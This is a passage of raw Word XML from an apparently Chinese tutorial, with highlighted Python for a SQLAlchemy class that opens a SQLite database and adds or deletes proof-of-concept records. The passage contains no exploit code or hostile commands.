          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.id, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.eid, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.title)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FA883A" w14:textId="77777777" w:rsidR="000C1018" w:rsidRPr="00204F06" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CB8ED36" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E642478" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AF55D67" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与数据库的通信</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320D21FE" w14:textId="77777777" w:rsidR="000C1018" w:rsidRDefault="000C1018" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>create_engine()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与数据库进行连接，而具体的增删改查需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>session</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进行操作</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739BD5D0" w14:textId="77777777" w:rsidR="00327971" w:rsidRDefault="00327971" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">class </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DBEngine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>object</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>__init__</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.engine = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>create_engine</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'sqlite:///exploit_db.sqlite'</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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db_session = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sessionmaker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>autocommit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>autoflush</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>False</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.engine)</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">.session = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>db_session</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>close_db</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>close</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t># interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    # lower words connected with '_'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add_poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</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D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Poc</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>添加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Poc</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>commit</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r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>del_poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eid</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5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="??" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="??"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>删除</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="5C6370"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">poc = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(DBPoc).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>filter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(DBPoc.eid == </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="D19A66"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>eid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="61AFEF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>first</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>try</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C678DD"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>self</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.session.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
